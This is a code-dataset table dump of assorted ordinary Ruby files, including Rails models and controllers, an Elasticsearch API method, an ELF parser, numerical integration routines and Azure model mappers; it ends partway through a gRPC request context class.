hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
0866f4f611953e25acbc2a049d7f449f0354ffa8 | 757 | require 'test_helper'
class MicropostTest < ActiveSupport::TestCase
def setup
@user = users(:michael)
# This code is not idiomatically correct.
@micropost = @user.microposts.build(content: "Lorem ipsum")
end
test "should be valid" do
assert @micropost.valid?
end
test "user id should be present" do
@micropost.user_id = nil
assert_not @micropost.valid?
end
test "content should be present" do
@micropost.content = " "
assert_not @micropost.valid?
end
test "content should be at most 140 characters" do
@micropost.content = "a" * 141
assert_not @micropost.valid?
end
test "order should be most recent first" do
assert_equal microposts(:most_recent), Micropost.first
end
end | 22.939394 | 63 | 0.689564 |
1c7abd9eff332bbaa3b77dfb6185e819f0830dae | 1,827 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module XPack
module API
module MachineLearning
module Actions
# Deletes a calendar.
#
# @option arguments [String] :calendar_id The ID of the calendar to delete
# @option arguments [Hash] :headers Custom HTTP headers
#
# @see https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-calendar.html
#
def delete_calendar(arguments = {})
raise ArgumentError, "Required argument 'calendar_id' missing" unless arguments[:calendar_id]
headers = arguments.delete(:headers) || {}
arguments = arguments.clone
_calendar_id = arguments.delete(:calendar_id)
method = Elasticsearch::API::HTTP_DELETE
path = "_ml/calendars/#{Elasticsearch::API::Utils.__listify(_calendar_id)}"
params = {}
body = nil
perform_request(method, path, params, body, headers).body
end
end
end
end
end
end
| 35.823529 | 105 | 0.673235 |
e9cbf8a406d48edf1d73754596886176de957cad | 138 | if File.readable?("REVISION")
CurrentCommit = File.read("REVISION").strip
else
CurrentCommit = `git rev-parse --short HEAD`.chomp
end
| 23 | 52 | 0.731884 |
1c0b29fbcc66145387ea1b2398a9664b8b3a16ca | 543 | class ApplicationController < ActionController::Base
protect_from_forgery with: :exception
helper_method :current_user
def current_user
if session[:user_id]
@current_user ||= User.find(session[:user_id])
end
end
def authorize
if !current_user
flash[:alert] = "You aren't authorized to visit that page."
redirect_to '/'
end
end
def admin_only
if current_user.admin === false
flash[:alert] = "You must be an admin to view or edit this page!"
redirect_to '/'
end
end
end | 21.72 | 71 | 0.67035 |
33bb6190e621ea96b2827123741ff11910d5b2e3 | 124 | require "test_helper"
class PreferenceTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
end
| 15.5 | 46 | 0.709677 |
e8ba3b255ab646602f40b9644c53603234e354d0 | 192 | class ApplicationMailer < ActionMailer::Base
# The gmail address specified here will be used to send emails to recipients.
default from: Rails.application.credentials.email[:username]
end
| 38.4 | 79 | 0.802083 |
1a6c3580c2deefd4f03ae4f5fffff50102d5c66d | 3,418 | # encoding: utf-8
require File.join(File.dirname(__FILE__), "../spec_helper.rb")
describe ActiveService::Model::Aggregations do
describe :composed_of do
context "with multiple value object" do
before do
spawn_model "User" do
attribute :address_street
attribute :address_city
composed_of :address, mapping: [ %w(address_street street), %w(address_city city) ]
end
class Address
attr_reader :street, :city
def initialize(attributes = {})
@street = attributes[:street]
@city = attributes[:city]
end
end
end
subject(:user) { User.new(:address_street => "123 Sesame St.", :address_city => "New York City") }
it "maps address attributes" do
expect(user.address.street).to eq "123 Sesame St."
expect(user.address.city).to eq "New York City"
end
it "maintains original attributes" do
expect(user.address_street).to eq "123 Sesame St."
expect(user.address_city).to eq "New York City"
end
it "handles respond_to for getter" do
expect { user.address }.not_to raise_error
expect(user.address).to be_kind_of(Address)
end
it "handles respond_to for setter" do
expect(user).to respond_to :address=
end
it "updates aggregation when attributes are updated" do
user.address_street = "New Street"
user.address_city = "New City"
expect(user.address.street).to eq "New Street"
expect(user.address.city).to eq "New City"
end
it "updates attributes when aggregation is updated" do
user.address = Address.new(:street => "New Street", :city => "New City")
expect(user.address_street).to eq "New Street"
expect(user.address_city).to eq "New City"
end
it "handles nil assignment" do
user.address = nil
expect(user.address).to_not be_nil
expect(user.address.street).to be_nil
expect(user.address.city).to be_nil
expect(user.address_street).to be_nil
expect(user.address_city).to be_nil
end
end
context "when class_name option is provided" do
before do
spawn_model "User" do
attribute :address_street
attribute :address_city
composed_of :work_address, class_name: 'Address', mapping: [ %w(address_street street), %w(address_city city) ]
end
class Address
attr_reader :street, :city
def initialize(attributes = {})
@street = attributes[:street]
@city = attributes[:city]
end
end
class BadAddress; end
end
subject(:user) { User.new(:address_street => "123 Sesame St.", :address_city => "New York City") }
it "maps to class having different class_name" do
expect(user.work_address.street).to eq "123 Sesame St."
expect(user.work_address.city).to eq "New York City"
expect(user.work_address).to be_kind_of(Address)
end
it "handles assignment of aggregation having different class_name" do
address = Address.new(:street => "New Street", :city => "New City")
expect { user.work_address = address }.not_to raise_error
expect { user.work_address = BadAddress.new }.to raise_error(NoMethodError)
end
end
end
end
| 33.509804 | 121 | 0.624927 |
01f0da120bfcfafc3ed81fcfe07e5c3d68fefea0 | 245 | #coding: utf-8
class ChangeVipDefaultAction < ActiveRecord::Migration
def up
sf = SystemFunction.find_by_subject_title('转账客户管理')
if sf.present?
sf.default_action = 'vips_path()'
sf.save!
end
end
def down
end
end
| 17.5 | 55 | 0.681633 |
91058b99ca9052444e2ceb2435fcea0e43ca397a | 7,076 | # frozen_string_literal: true
class V4::VerseFinder < ::VerseFinder
def random_verse(filters, language_code, words: true, tafsirs: false, translations: false, audio: false)
@results = Verse.unscope(:order).where(filters).order('RANDOM()').limit(3)
load_translations(translations) if translations.present?
load_words(language_code) if words
load_audio(audio) if audio
load_tafsirs(tafsirs) if tafsirs.present?
words_ordering = words ? ', words.position ASC, word_translations.priority ASC' : ''
translations_order = translations.present? ? ',translations.priority ASC' : ''
@results.order("verses.verse_index ASC #{words_ordering} #{translations_order}".strip).sample
end
def find_with_key(key, language_code, words: true, tafsirs: false, translations: false, audio: false)
@results = Verse.where(verse_key: key).limit(1)
load_translations(translations) if translations.present?
load_words(language_code) if words
load_audio(audio) if audio
load_tafsirs(tafsirs) if tafsirs.present?
words_ordering = words ? ', words.position ASC, word_translations.priority ASC' : ''
translations_order = translations.present? ? ',translations.priority ASC' : ''
@results.order("verses.verse_index ASC #{words_ordering} #{translations_order}".strip).first
end
def load_verses(filter, language_code, words: true, tafsirs: false, translations: false, audio: false)
fetch_verses_range(filter)
load_translations(translations) if translations.present?
load_words(language_code) if words
load_audio(audio) if audio
load_tafsirs(tafsirs) if tafsirs.present?
words_ordering = words ? ', words.position ASC, word_translations.priority ASC' : ''
translations_order = translations.present? ? ',translations.priority ASC' : ''
@results.order("verses.verse_index ASC #{words_ordering} #{translations_order}".strip)
end
def fetch_verses_range(filter)
@results = send("fetch_#{filter}")
end
protected
def fetch_advance_copy
if params[:from] && params[:to]
verse_from = QuranUtils::Quran.get_ayah_id_from_key(params[:from])
verse_to = QuranUtils::Quran.get_ayah_id_from_key(params[:to])
@verses = Verse
.unscoped
.order('verses.verse_index asc')
.where('verses.verse_index >= :from AND verses.verse_index <= :to', from: verse_from, to: verse_to)
else
@verses = Verse.none
end
@verses
end
def fetch_filter
utils = QuranUtils::VerseRanges.new
ids = utils.get_ids_from_ranges(params[:filters])
results = Verse.unscoped.where(id: ids)
@total_records = results.size
@results = results.limit(per_page).offset((current_page - 1) * per_page)
if current_page < total_pages
@next_page = current_page + 1
end
@results
end
def fetch_by_chapter
chapter = find_chapter
@total_records = chapter.verses_count
verse_start = verse_pagination_start
verse_end = verse_pagination_end(verse_start, @total_records)
@next_page = current_page + 1 if verse_end < params[:to]
@results = Verse
.where(chapter_id: chapter.id)
.where('verses.verse_number >= ? AND verses.verse_number <= ?', verse_start.to_i, verse_end.to_i)
end
def fetch_by_page
mushaf_page = find_mushaf_page
# Disable pagination for by_page route
@per_page = @total_records = mushaf_page.verses_count
@next_page = nil
@results = rescope_verses('verse_index').where(page_number: mushaf_page.page_number)
end
def fetch_by_rub_el_hizb
rub_el_hizb = find_rub_el_hizb
# Disable pagination for by_page route
@per_page = @total_records = rub_el_hizb.verses_count
@next_page = nil
@results = rescope_verses('verse_index').where(rub_el_hizb_number: rub_el_hizb.rub_el_hizb_number)
end
def fetch_by_hizb
hizb = find_hizb
results = rescope_verses('verse_index')
.where(hizb_number: hizb.hizb_number)
@total_records = results.size
@results = results.limit(per_page).offset((current_page - 1) * per_page)
if current_page < total_pages
@next_page = current_page + 1
end
@results
end
def fetch_by_juz
juz = find_juz
verse_start = juz.first_verse_id + (current_page - 1) * per_page
verse_end = min(verse_start + per_page, juz.last_verse_id + 1)
if verse_end < juz.last_verse_id
@next_page = current_page + 1
end
@total_records = juz.verses_count
@results = rescope_verses('verse_index')
.where(juz_number: juz.juz_number)
.where('verses.verse_index >= ? AND verses.verse_index < ?', verse_start.to_i, verse_end.to_i)
end
def fetch_by_ruku
ruku = find_ruku
# Disable pagination for ruku route
@per_page = @total_records = ruku.verses_count
@next_page = nil
@results = rescope_verses('verse_index').where(ruku_number: ruku.ruku_number)
end
def fetch_by_manzil
manzil = find_manzil
verse_start = manzil.first_verse_id + (current_page - 1) * per_page
verse_end = min(verse_start + per_page, manzil.last_verse_id + 1)
if verse_end < manzil.last_verse_id
@next_page = current_page + 1
end
@total_records = manzil.verses_count
@results = rescope_verses('verse_index')
.where(manzil_number: manzil.manzil_number)
.where('verses.verse_index >= ? AND verses.verse_index < ?', verse_start.to_i, verse_end.to_i)
end
def verse_pagination_start
if (from = (params[:from] || 1).to_i.abs).zero?
from = 1
end
from + (current_page - 1) * per_page
end
def verse_pagination_end(start, total_verses)
to = params[:to].presence ? params[:to].to_i.abs : nil
verse_to = min(to || total_verses, total_verses)
params[:to] = verse_to
min((start + per_page - 1), verse_to)
end
def load_words(word_translation_lang)
language = Language.find_with_id_or_iso_code(word_translation_lang)
words_with_default_translation = @results.where(word_translations: { language_id: Language.default.id })
if language
@results = @results
.where(word_translations: { language_id: language.id })
.or(words_with_default_translation)
.eager_load(words: eager_load_words)
else
@results = words_with_default_translation.eager_load(words: eager_load_words)
end
end
def load_translations(translations)
@results = @results
.where(translations: { resource_content_id: translations })
.eager_load(:translations)
end
def load_tafsirs(tafsirs)
@results = @results
.where(tafsirs: { resource_content_id: tafsirs })
.eager_load(:tafsirs)
end
def load_audio(recitation)
@results = @results
.where(audio_files: { recitation_id: recitation })
.eager_load(:audio_file)
end
def rescope_verses(by)
Verse.unscope(:order).order("#{by} ASC")
end
end
| 32.608295 | 117 | 0.687818 |
019b188015ff4e030c71f48a8fe755e046d3b378 | 908 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
# require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
# require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
Bundler.require(*Rails.groups)
require "sinope"
module Dummy
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.2
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
end
end
| 29.290323 | 82 | 0.784141 |
3865ef644ce0ab22a475c4923a06b3ef906d5c9c | 4,055 | module ELFShim
# See: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#File_header
MAGIC_NUMBER_OFFSET = 0
MAGIC_NUMBER_ASCII = "\x7fELF".freeze
OS_ABI_OFFSET = 0x07
OS_ABI_SYSTEM_V = 0
OS_ABI_LINUX = 3
TYPE_OFFSET = 0x10
TYPE_EXECUTABLE = 2
TYPE_SHARED = 3
ARCHITECTURE_OFFSET = 0x12
ARCHITECTURE_I386 = 0x3
ARCHITECTURE_POWERPC = 0x14
ARCHITECTURE_ARM = 0x28
ARCHITECTURE_X86_64 = 0x62
ARCHITECTURE_AARCH64 = 0xB7
def read_uint8(offset)
read(1, offset).unpack("C").first
end
def read_uint16(offset)
read(2, offset).unpack("v").first
end
def elf?
return @elf if defined? @elf
return @elf = false unless read(MAGIC_NUMBER_ASCII.size, MAGIC_NUMBER_OFFSET) == MAGIC_NUMBER_ASCII
# Check that this ELF file is for Linux or System V.
# OS_ABI is often set to 0 (System V), regardless of the target platform.
@elf = [OS_ABI_LINUX, OS_ABI_SYSTEM_V].include? read_uint8(OS_ABI_OFFSET)
end
def arch
return :dunno unless elf?
@arch ||= case read_uint16(ARCHITECTURE_OFFSET)
when ARCHITECTURE_I386 then :i386
when ARCHITECTURE_X86_64 then :x86_64
when ARCHITECTURE_POWERPC then :powerpc
when ARCHITECTURE_ARM then :arm
when ARCHITECTURE_AARCH64 then :arm64
else :dunno
end
end
def elf_type
return :dunno unless elf?
@elf_type ||= case read_uint16(TYPE_OFFSET)
when TYPE_EXECUTABLE then :executable
when TYPE_SHARED then :dylib
else :dunno
end
end
def dylib?
elf_type == :dylib
end
def binary_executable?
elf_type == :executable
end
def dynamic_elf?
return @dynamic_elf if defined? @dynamic_elf
if which "readelf"
Utils.popen_read("readelf", "-l", to_path).include?(" DYNAMIC ")
elsif which "file"
!Utils.popen_read("file", "-L", "-b", to_path)[/dynamic|shared/].nil?
else
raise "Please install either readelf (from binutils) or file."
end
end
class Metadata
attr_reader :path, :dylib_id, :dylibs
def initialize(path)
@path = path
@dylibs = []
@dylib_id, needed = needed_libraries path
return if needed.empty?
ldd = DevelopmentTools.locate "ldd"
ldd_output = Utils.popen_read(ldd, path.expand_path.to_s).split("\n")
return unless $CHILD_STATUS.success?
ldd_paths = ldd_output.map do |line|
match = line.match(/\t.+ => (.+) \(.+\)|\t(.+) => not found/)
next unless match
match.captures.compact.first
end.compact
@dylibs = ldd_paths.select do |ldd_path|
next true unless ldd_path.start_with? "/"
needed.include? File.basename(ldd_path)
end
end
private
def needed_libraries(path)
if DevelopmentTools.locate "readelf"
needed_libraries_using_readelf path
elsif DevelopmentTools.locate "patchelf"
needed_libraries_using_patchelf path
else
raise "patchelf must be installed: brew install patchelf"
end
end
def needed_libraries_using_patchelf(path)
patchelf = DevelopmentTools.locate "patchelf"
if path.dylib?
command = [patchelf, "--print-soname", path.expand_path.to_s]
soname = Utils.safe_popen_read(*command).chomp
end
command = [patchelf, "--print-needed", path.expand_path.to_s]
needed = Utils.safe_popen_read(*command).split("\n")
[soname, needed]
end
def needed_libraries_using_readelf(path)
soname = nil
needed = []
command = ["readelf", "-d", path.expand_path.to_s]
lines = Utils.safe_popen_read(*command).split("\n")
lines.each do |s|
filename = s[/\[(.*)\]/, 1]
next if filename.nil?
if s.include? "(SONAME)"
soname = filename
elsif s.include? "(NEEDED)"
needed << filename
end
end
[soname, needed]
end
end
def metadata
@metadata ||= Metadata.new(self)
end
def dylib_id
metadata.dylib_id
end
def dynamically_linked_libraries(*)
metadata.dylibs
end
end
| 25.664557 | 103 | 0.660912 |
6a1ff979c3f567acd4a6f83c0bc2cb7c4ad21548 | 954 | require "test_helper"
class DesktopTest < Minitest::Test
def setup
@app_roots = [
ONDEMAND.join("apps", "bc_desktop"),
AWESIM.join("apps", "bc_desktop"),
]
end
def test_that_it_is_same_across_portals
app_files = @app_roots.map do |p|
Dir.glob(p.join("**", "*")).map{|f| Pathname.new(f)}.select(&:file?).sort
end
# Check for missing files
rel_files = @app_roots.zip(app_files).map do |dir, files|
files.map {|f| f.relative_path_from(dir)}
end
missing = (rel_files.reduce(:+) - rel_files.reduce(:&)).uniq.map do |p|
@app_roots.map { |dir| dir.join(p) }.reject(&:file?)
end.flatten
assert missing.empty?, "Missing Desktop App files:\n #{missing.join("\n ")}"
# Compare files
app_files.combination(2) do |a_files, b_files|
a_files.zip(b_files) do |a, b|
assert FileUtils.cmp(a, b), "Desktop App files differ:\n #{a}\n #{b}"
end
end
end
end
| 28.909091 | 82 | 0.618449 |
e275a67ffe1fcccd335d331bb22cb0d8d231007b | 1,350 | class EventsController < ApplicationController
def new
init
@event = Event.new
@event.ticket_types.build
end
def index
params[:search] ? @events = Event.search(params[:search]).where("starts_at > ?", DateTime.now).where(published: true) : @events = Event.where("starts_at > ?", DateTime.now).where(published: true)
end
def create
init
@event = Event.create event_params
@event.creater_id = current_user.id
@event.venue_id = params[:venue_id]
@event.category_id = params[:category_id]
if @event.starts_at < @event.ends_at
if @event.save
flash[:success] = "Event is made"
redirect_to root_path
else
flash.now[:error] = "Error: #{@event.errors.full_messages.to_sentence}"
redirect_to new_event_path
end
else
flash.now[:error] = "Event can't start after it end"
redirect_to new_event_path
end
end
def updateStatus
@event = Event.find(params[:event_id])
@event.toggle!(:published)
@event.save
redirect_to user_path(current_user.id)
end
def show
@event = Event.find(params[:id])
end
private
def event_params
params.require(:event).permit(:name, :starts_at, :ends_at, :hero_image_url, :extended_html_description, :venue_id, :category_id, ticket_types_attributes: [:name, :price, :max_quantity])
end
def init
@venues = Venue.all
@categories = Category.all
end
end
| 24.545455 | 197 | 0.717037 |
2634f30c942c3db65e6be5483c327faec51cc932 | 4,577 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::RecoveryServicesSiteRecovery::Mgmt::V2018_01_10
module Models
#
# HyperV replica 2012 R2 (Blue) replication details.
#
class HyperVReplicaBlueReplicationDetails < ReplicationProviderSpecificSettings
include MsRestAzure
def initialize
@instanceType = "HyperVReplica2012R2"
end
attr_accessor :instanceType
# @return [DateTime] The Last replication time.
attr_accessor :last_replicated_time
# @return [Array<VMNicDetails>] The PE Network details.
attr_accessor :vm_nics
# @return [String] The virtual machine Id.
attr_accessor :vm_id
# @return [String] The protection state for the vm.
attr_accessor :vm_protection_state
# @return [String] The protection state description for the vm.
attr_accessor :vm_protection_state_description
# @return [InitialReplicationDetails] Initial replication details.
attr_accessor :initial_replication_details
# @return [Array<DiskDetails>] VM disk details.
attr_accessor :v_mdisk_details
#
# Mapper for HyperVReplicaBlueReplicationDetails class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'HyperVReplica2012R2',
type: {
name: 'Composite',
class_name: 'HyperVReplicaBlueReplicationDetails',
model_properties: {
instanceType: {
client_side_validation: true,
required: true,
serialized_name: 'instanceType',
type: {
name: 'String'
}
},
last_replicated_time: {
client_side_validation: true,
required: false,
serialized_name: 'lastReplicatedTime',
type: {
name: 'DateTime'
}
},
vm_nics: {
client_side_validation: true,
required: false,
serialized_name: 'vmNics',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'VMNicDetailsElementType',
type: {
name: 'Composite',
class_name: 'VMNicDetails'
}
}
}
},
vm_id: {
client_side_validation: true,
required: false,
serialized_name: 'vmId',
type: {
name: 'String'
}
},
vm_protection_state: {
client_side_validation: true,
required: false,
serialized_name: 'vmProtectionState',
type: {
name: 'String'
}
},
vm_protection_state_description: {
client_side_validation: true,
required: false,
serialized_name: 'vmProtectionStateDescription',
type: {
name: 'String'
}
},
initial_replication_details: {
client_side_validation: true,
required: false,
serialized_name: 'initialReplicationDetails',
type: {
name: 'Composite',
class_name: 'InitialReplicationDetails'
}
},
v_mdisk_details: {
client_side_validation: true,
required: false,
serialized_name: 'vMDiskDetails',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'DiskDetailsElementType',
type: {
name: 'Composite',
class_name: 'DiskDetails'
}
}
}
}
}
}
}
end
end
end
end
| 31.349315 | 83 | 0.493118 |
acadac733c8229e6059090ae672b4af05a77dff6 | 209 | require 'twitch'
::TWITCH = Twitch.new({
client_id: ENV['TWITCH_CLIENT_ID'],
secret_key: ENV['TWITCH_CLIENT_SECRET'],
redirect_uri: 'http://japanesekoreanug.com',
scope: ['user_read']
})
TWITCH.link
| 19 | 46 | 0.708134 |
629c3c6560daec0cb76af4f7e1edad78549ec5a4 | 915 | Profiles::Application.routes.draw do
root 'users#me'
match '/search', to: 'users#search', via: 'post'
match '/groups', to: 'users#list_groups', via: 'get'
match '/users', to: 'users#list_users', via: 'get'
match '/years', to: 'users#list_years', via: 'get'
match '/user/:uid', to: 'users#user', via: 'get', constraints: { :uid => /[\w+\.]+/ }
match '/me', to: 'users#me', via: 'get'
match '/image/:uid', to: 'users#image', via: 'get', constraints: { :uid => /[\w+\.]+/ }
match '/autocomplete', to: 'users#autocomplete', via: 'get'
match '/update', to: 'users#update', via: 'post'
match '/profiles', to: 'users#user', via: 'get'
match '/group/:group', to: 'users#group', via: 'get'
match '/year/:year', to: 'users#year', via: 'get'
match '/autocomplete', to: 'users#autocomplete', via: 'get'
match '/clearcache', to: 'users#clear_cache', via: 'get'
end
| 50.833333 | 92 | 0.585792 |
f804345bbbdeba493f0df8360878a660894d64b1 | 4,108 | module Silicium
class IntegralDoesntExistError < RuntimeError
end
##
# A class providing numerical integration methods
class NumericalIntegration
# Computes integral from +a+ to +b+ of +block+ with accuracy +eps+
def self.three_eights_integration(a, b, eps = 0.0001, &block)
wrapper_method([a, b], eps, 'three_eights_integration_n', &block)
end
# Computes integral from +a+ to +b+ of +block+ with +n+ segmentations
def self.three_eights_integration_n(a, b, n, &block)
dx = (b - a) / n.to_f
result = 0
x = a
n.times do
result +=
(block.call(x) + 3 * block.call((2 * x + x + dx) / 3.0) +
3 * block.call((x + 2 * (x + dx)) / 3.0) + block.call(x + dx)) / 8.0 * dx
x += dx
end
result
end
# Simpson integration with a segment
def self.simpson_integration_with_a_segment(a, b, n, &block)
dx = (b - a) / n.to_f
result = 0
i = 0
while i < n
result += (block.call(a + i * dx) + 4 * block.call(((a + i * dx) +
(a + (i + 1) * dx)) / 2.0) + block.call(a + (i + 1) * dx)) / 6.0 * dx
i += 1
end
result
end
# Simpson integration with specified accuracy
def self.simpson_integration(a, b, eps = 0.0001, &block)
wrapper_method([a, b], eps, 'simpson_integration_with_a_segment', &block)
end
# Left Rectangle Method and Right Rectangle Method
def self.left_rect_integration(left_p, right_p, eps = 0.0001, &block)
splits = 1
res1 = left_rect_integration_n(left_p, right_p, 1, &block)
res2 = left_rect_integration_n(left_p, right_p, 5, &block)
while (res1 - res2).abs > eps
res1 = left_rect_integration_n(left_p, right_p, splits, &block)
splits *= 5
res2 = left_rect_integration_n(left_p, right_p, splits, &block)
end
(res1 + res2) / 2.0
end
# Left Rectangle Auxiliary Method and Right Rectangle Auxiliary Method
def self.left_rect_integration_n(left_p, right_p, splits, &block)
dx = (right_p - left_p) / splits.to_f
result = 0
i = 0
while i < splits
result += block.call(left_p + i * dx)
i += 1
end
result * dx
end
# Middle Rectangles Method with a segment
def self.middle_rectangles_with_a_segment(a, b, n, &block)
dx = (b - a) / n.to_f
result = 0
i = 0
n.times do
result += block.call(a + dx * (i + 1 / 2)) * dx
i += 1
end
result
end
# Middle Rectangles Method with specified accuracy
def self.middle_rectangles(a, b, eps = 0.0001, &block)
wrapper_method([a, b], eps, 'middle_rectangles_with_a_segment', &block)
end
# Trapezoid Method with a segment
def self.trapezoid_with_a_segment(a, b, n, &block)
dx = (b - a) / n.to_f
result = 0
i = 1
(n - 1).times do
result += block.call(a + dx * i)
i += 1
end
result += (block.call(a) + block.call(b)) / 2.0
result * dx
end
# Trapezoid Method with specified accuracy
def self.trapezoid(a, b, eps = 0.0001, &block)
wrapper_method([a, b], eps, 'trapezoid_with_a_segment', &block)
end
private
# Wrapper method for num_integratons methods
def self.wrapper_method(a_b, eps, func, &block)
n = 1
begin
begin
result = eval "#{func}(a_b[0], a_b[1], n, &block)"
n *= 5
result1 = eval "#{func}(a_b[0], a_b[1], n, &block)"
if result.nan? || result1.nan?
raise IntegralDoesntExistError, 'We have not-a-number result :('
end
if result == Float::INFINITY || result1 == Float::INFINITY
raise IntegralDoesntExistError, 'We have infinity :('
end
end until (result - result1).abs < eps
rescue Math::DomainError
raise IntegralDoesntExistError, 'Domain error in math function'
rescue ZeroDivisionError
raise IntegralDoesntExistError, 'Divide by zero'
end
(result + result1) / 2.0
end
end
end
| 29.985401 | 87 | 0.581548 |
8785014ef73aa69198dd681c902d6662027ae5af | 2,075 | control 'packages' do
impact 1.0
title 'confirm package installation'
desc 'confirm all desired packages are installed'
describe command('apk info') do
its('stdout') { should include ('curl') }
its('stdout') { should include ('python3') }
its('stdout') { should include ('build-base') }
its('stdout') { should include ('python3-dev') }
its('stdout') { should include ('libffi-dev') }
its('stdout') { should include ('libressl-dev') }
end
end
control 'python3 version' do
impact 1.0
title 'confirm python3 version installed'
desc 'confirm version reported by python3 matches the desired version'
describe command('python3 -V') do
its('stdout') { should include ('3.7') }
end
end
control 'pip version' do
impact 1.0
title 'confirm pip version installed'
desc 'confirm version reported by pip3 matches the desired version'
describe command('pip -V') do
its('stdout') { should include ('19.2') }
end
end
control 'python packages' do
impact 1.0
title 'confirm python package installation'
desc 'confirm all desired python packages are installed'
describe command('pip list') do
its('stdout') { should include ('setuptools') }
its('stdout') { should include ('wheel') }
its('stdout') { should include ('twine') }
end
end
control 'wheel version' do
impact 1.0
title 'confirm wheel version installed'
desc 'confirm version reported by wheel matches the desired version'
describe command('wheel version') do
its('stdout') { should include ('0.33') }
end
end
control 'twine version' do
impact 1.0
title 'confirm twine version installed'
desc 'confirm version reported by twine matches the desired version'
describe command('twine --version') do
its('stdout') { should include ('1.14') }
end
end
control 'cc-test-reporter installed' do
impact 1.0
title 'confirm cc-test-reporter installed'
desc 'confirm cc-test-reporter installed'
describe command('cc-test-reporter --version') do
its('stdout') { should include ('Code Climate Test Reporter') }
end
end
| 29.642857 | 72 | 0.69494 |
bb9c8f802e321ca6fd5bc126cc2a1f95acef1c60 | 686 | # Copyright 2016 LINE
#
# LINE Corporation licenses this file to you under the Apache License,
# version 2.0 (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
module Line
module Bot
module API
VERSION = "1.2.2"
end
end
end
| 31.181818 | 77 | 0.740525 |
e8970fc59fa68c05c7e285490f814e81ce4cbb05 | 527 | #!/usr/bin/ruby
free = `sar -d 1 5|grep Average`.split("\n")
descriptions = free[0].split(/\s+|\|/).collect{|x| x.strip.sub("/s","")}
descriptions.shift(2)
free.shift
interfaces = Hash.new
free.each do |interface|
interface = interface.strip.split(/\s+/).collect(&:strip)
interface.shift
ifname = interface.shift
interfaces[ifname] = interface.collect(&:to_f).zip(descriptions)
end
interfaces.each do |key, value|
value.each do |value, description|
puts "#{key}.#{description.sub('%','')} #{value}"
end
end
| 26.35 | 73 | 0.669829 |
d5959479b13b2f9fe39832b3a046964ba6d37921 | 1,109 | # typed: true
# frozen_string_literal: true
module EntityMapper
module ActiveRecord
class Context
def initialize(transaction_class: ::ActiveRecord::Base)
@tracked_aggregates = []
@transaction_class = transaction_class
end
def call
@transaction_class.transaction do
yield(self).tap do
save_changes
end
end
end
def read(mapping, active_record_object, options = {})
mapped_entity, ar_map = ActiveRecord::Read.call(mapping, active_record_object, options)
@tracked_aggregates << TrackedAggregate.new(
mapped_entity, ar_map, active_record_object, mapping
)
mapped_entity
end
def create(mapping, entity, active_record_class)
active_record_object = active_record_class.new
@tracked_aggregates << TrackedAggregate.new(
entity, ArMap.new, active_record_object, mapping
)
active_record_object
end
private
def save_changes
@tracked_aggregates.each(&:save_changes)
end
end
end
end
| 24.644444 | 95 | 0.649234 |
91185177fb9d77d4aa40f85adfcbd0ce1daeaa73 | 2,486 | # Copyright (c) 2017-present, BigCommerce Pty. Ltd. All rights reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
module Gruf
module Outbound
##
# Encapsulates the context of an outbound client request
#
class RequestContext
# @var [Symbol]
attr_reader :type
# @var [Enumerable] requests
attr_reader :requests
# @var [GRPC::ActiveCall]
attr_reader :call
# @var [Method] method
attr_reader :method
# @var [Hash] metadata
attr_reader :metadata
##
# Initialize the new request context
#
# @param [Symbol] type The type of request
# @param [Enumerable] requests An enumerable of requests being sent
# @param [GRPC::ActiveCall] call The GRPC ActiveCall object
# @param [Method] method The method being called
# @param [Hash] metadata A hash of outgoing metadata
#
def initialize(type:, requests:, call:, method:, metadata:)
